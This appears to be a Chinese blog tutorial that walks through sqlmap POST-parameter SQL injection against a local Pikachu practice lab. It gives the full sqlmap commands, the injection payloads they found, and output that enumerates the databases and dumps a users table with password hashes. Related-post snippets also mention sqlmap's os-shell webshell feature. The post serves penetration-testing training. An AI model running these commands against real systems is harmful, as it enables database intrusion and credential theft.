Sqlmap -- POST注入

最新推荐文章于 2024-06-17 13:37:15 发布
最新推荐文章于 2024-06-17 13:37:15 发布
阅读量2.8k 收藏 15
点赞数 1
分类专栏: web安全工具库 文章标签: sqlmap post注入 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/118546243
版权

  想归想,难过归难过,若你岁岁平安,我可生生不见。。。

----  网易云热评

一、检测是否存在注入

1、通过BurpSuite抓包获取提交的数据

2、sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2"

--data指定提交的数据

运行结果:id值存在注入,可能是布尔盲注、报错注入、时间盲注、联合注入

[14:37:09] [INFO] POST parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable

POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests:

---

Parameter: id (POST)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=1 AND 9442=9442&submit=%E6%9F%A5%E8%AF%A2

    Type: error-based

    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)

    Payload: id=1 AND GTID_SUBSET(CONCAT(0x717a717871,(SELECT (ELT(4194=4194,1))),0x7170717671),4194)&submit=%E6%9F%A5%E8%AF%A2

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: id=1 AND (SELECT 2494 FROM (SELECT(SLEEP(5)))BUUY)&submit=%E6%9F%A5%E8%AF%A2

    Type: UNION query

    Title: Generic UNION query (NULL) - 2 columns

    Payload: id=1 UNION ALL SELECT CONCAT(0x717a717871,0x59534b7664464e646f414f4e546e6c72455448476447636f50574a75434971514a486f6d724a664e,0x7170717671),NULL-- -&submit=%E6%9F%A5%E8%AF%A2

---

[14:37:16] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.4.45, Nginx 1.15.11, PHP

back-end DBMS: MySQL >= 5.6

[14:37:16] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

二、获取数据库名称

sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" --dbs

转存失败重新上传取消转存失败重新上传取消转存失败重新上传取消

运行结果:

[14:42:01] [INFO] the back-end DBMS is MySQL

web application technology: Nginx 1.15.11, PHP, PHP 5.4.45

back-end DBMS: MySQL >= 5.6

[14:42:01] [INFO] fetching database names

available databases [10]:

[*] challenges

[*] dvwa

[*] information_schema

[*] mysql

[*] performance_schema

[*] pikachu

[*] security

[*] sys

[*] www_dgdg_com

[*] www_zm_com

[14:42:01] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'  

三、获取表名

sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" -D pikachu --tables

运行结果:

14:44:08] [INFO] the back-end DBMS is MySQL

web application technology: PHP, PHP 5.4.45, Nginx 1.15.11

back-end DBMS: MySQL >= 5.6

[14:44:08] [INFO] fetching tables for database: 'pikachu'

Database: pikachu

[5 tables]

+----------+

| member   |

| httpinfo |

| message  |

| users    |

| xssblind |

+----------+

[14:44:08] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

四、获取字段名

sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --columns

运行结果:

[14:51:18] [INFO] the back-end DBMS is MySQL

web application technology: PHP, PHP 5.4.45, Nginx 1.15.11

back-end DBMS: MySQL >= 5.6

[14:51:18] [INFO] fetching columns for table 'users' in database 'pikachu'

Database: pikachu

Table: users

[4 columns]

+----------+------------------+

| Column   | Type             |

+----------+------------------+

| level    | int(11)          |

| id       | int(10) unsigned |

| password | varchar(66)      |

| username | varchar(30)      |

+----------+------------------+

[14:51:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

五、获取字段内容

sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --dump "username,password

运行结果:

Database: pikachu                                                                        

Table: users

[3 entries]

+----+---------+-------------------------------------------+----------+

| id | level   | password                                  | username |

+----+---------+-------------------------------------------+----------+

| 1  | 1       | e10adc3949ba59abbe56e057f20f883e (123456) | admin    |

| 2  | 2       | 670b14728ad9902aecba32e22fa4f6bd (000000) | pikachu  |

| 3  | 3       | e99a18c428cb38d5f260853678922e03 (abc123) | test     |

+----+---------+-------------------------------------------+----------+

[14:56:08] [INFO] table 'pikachu.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.139.129/dump/pikachu/users.csv'                                                

[14:56:08] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

六、其他检测POST注入方法

1、BurpSuite抓包,将数据包内容保存到1.txt

POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1

Host: 192.168.139.129

Content-Length: 30

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://192.168.139.129

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://192.168.139.129/pikachu/vul/sqli/sqli_id.php

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: PHPSESSID=6t4bb3nb4rarqod4j073m038h4

Connection: close

id=1&submit=%E6%9F%A5%E8%AF%A2

2、获取数据库名称

sqlmap -r /home/aiyou/桌面/1.txt --dbs

-r:指定数据包的绝对路径

3、获取表名

sqlmap -r /home/aiyou/桌面/1.txt -D pikachu --tables

4、获取字段名

sqlmap -r /home/aiyou/桌面/1.txt -D pikachu -T users --columns

5、获取字段内容

sqlmap -r /home/aiyou/桌面/1.txt -D pikachu -T users --dump "username,password"

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

web安全工具库
关注
  • 1
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqlmap的使用_sqlmap --force-ssl(2),2024年最新2024大厂网络安全知识点总结
2301_76225520的博客
04-18 405
sqlmap -u “http://www.baidu.com/shownews.asp” –cookie “id=11” –level 2(只有level达到2才会检测cookie)2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。-d: 直接连接数据库 (-d “mysql://user:passward@地址:端口/数据库名称”)3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
SQLMAP-POST注入
大博的博客
08-17 1万+
BUGKU-ctf作为国内著名的ctf联系靶场,拥有丰富的题型加强我们的ctf水平。下面就是一次我认为比较典型的sql post注入题型。 抓包,复制出来打成一个txt文件 sqlmap -r test.txt -p admin_name –dbs 因为博主懒的没有在win环境下下载sqlmap,使用kali中自带sqlmap工具。下面简单解释一下工具命令。 ![]https://ss...
sqlmap post注入
zhaozhanyong的专栏
11-19 5900
0x00 常用的 注入点:http://tetasp.vulnweb.com/Login.asp 几种注入方式: sqlmap -r search-test.txt -p tfUPass 其中search-test.txt的内容为以下所抓的post包 0x01 常参数的 sqlmap -r search-test.txt -p tfUPss 0x02 常参数的 sql
sql注入sqlmap(渡栗的学习笔记)
2301_79998006的博客
06-17 1085
sqlmap的使用。Sqlmap是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。目前支持的数据库有MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access等大多数据库。
sqlmap --os-shell 原理详解
热门推荐
..
04-13 2万+
os-shell 执行原理 对于mysql数据库来说,--os-shell的本质就是写入两个php文件,其中的tmpugvzq.php可以让我们上传文件到网站路径下,如下图。 然后sqlmap就会通过上面这个php上传一个用于命令执行的tmpbylqf.php到网站路径下,让我们命令执行,并将输出的内容返回sqlmap端。 这是单看tmpbylqf.php的执行效果: 过程演示 本次实验环境是本机上搭建的sqli-libs,目的为了研究--os-shell的原理,..
5、sqlmap注入post类型+os-shell
weixin_51520483的博客
05-21 391
3、上bp抓取数据包,sqlmmap用post注入走一遍,找到数据库,账号密码,这里的账号密码其实也没什么用,形同虚设。5、试一下shell注入,一试一个准,直接进去了,查看一下根目录发现flag。2、判断注入类型,是一个字符注入,使用or直接绕过密码进去了。6、成功进入shell,查看根目录文件,发现flag。3、发现数据库没有机会的情况,换os-shell注入。4、老规矩,数据表、字段挨个走一遍,但没有什么发现。-r:表示目标为一个文件,bp抓的包。-p:表示一个参数,即一个注入的口。
sqlmap --os-shell选项原理解析
来日可期的博客
10-18 1759
sqlmap的--os-shell在mysql数据库中的原理,是往服务器上写入了两个php,其中一个提供了文件上传的页面,可以通过这个上传页面上传脚本文件到当前目录下。另外一个则是返回了可以让我们执行系统命令的命令行,命令行也可以在网页url中通过对cmd参数传参执行系统命令。
渗透工具-sqlmap-基本知识及使用教程
m0_59856804的博客
03-02 1583
sqlmap的详细使用教程
sqlmap --os-shell(写入木马获取getshell)
NSQ0207的博客
09-06 1120
抓包,查看报错暴露出绝对路径。
SQL注入神器---SqlMap
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
01-12 969
一、SQLmap简介 Sqlmap是一个有python编写的开源渗透工具,用于SQL漏洞检测,是一款功能强大的Sql注入漏洞利用工具。 可以检测的数据类型众多,包括:access、mssql、mysql、Oracle、postgraSql、sqlite等。 可以进行类型众多的注入利用,包括Sql盲注、union注入、报错注入、延时注入、cookie注入等。 其他功能:命令执行、枚举用户、检测权限、自动破解等。 二、Sqlmap的参数 1、基础参数 -h:查看帮助 –is-dba:查看用户权限 –dbs:.
sqlmap-master
06-23
3. **参数调整**:根据扫描结果,可能需要调整参数,例如指定GET或POST参数,或者选择注入技术。 4. **深入探测**:使用`--dbs`和`--tables`选项列出可用的数据库和表,然后使用`--columns`获取列名。 5. **数据...
sqlmap-sql注入工具
07-06
SQLMap通过命令行界面操作,有丰富的命令行选项和参数,如`--technique`用于选择注入技术,`--data`指定POST数据,`--threads`设置并发线程数等。同时,通过配置文件(如`sqlmap.conf`)可以进行更深入的自定义设置...
sqlmapproject-sqlmap-1.4.8-11-ga42ec7d.zip
08-20
在实际应用中,SQLMap也支持多种注入模式,如盲注、时间延迟注入、union注入等,以及POST请求、多参数注入和Cookie注入。这些功能使得SQLMap能够在各种复杂的环境中有效地进行漏洞探测和利用。 然而,值得注意的是...
sqlmapproject-sqlmap-1.1.6-8
06-15
SQLMap是一款著名的开源自动化SQL注入工具,主要用于检测和利用网站应用程序中的SQL注入漏洞。它的功能强大,能够帮助安全研究人员和渗透测试人员有效地发现并利用数据库的潜在风险。在这个"sqlmapproject-sqlmap-...
sqlmapproject-sqlmap-1.5.3-24-gbce3abc.zip
03-28
1. 自动化探测:SQLMap可以自动识别出各种类型的SQL注入点,包括GET、POST及其他HTTP方法的数据提交方式。 2. 深度扫描:除了基础的注入测试,SQLMap还能进行深度扫描,如盲注、时间基注入、错误注入等。 3. 数据库...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8362
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
数理方法习题 前六章.pdf
08-03
数理方法习题 前六章
某大型制造企业IT蓝图规划及实施路线.pptx
最新发布
08-03
某大型制造企业IT蓝图规划及实施路线.pptx
sqlmap如何实现post注入
04-30
SQLMap可以使用`--data`参数来指定POST请求的数据,然后进行注入测试。具体步骤如下: 1. 使用`-u`参数指定目标URL,并添加`--data`参数指定POST请求的数据,例如: ``` sqlmap -u ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值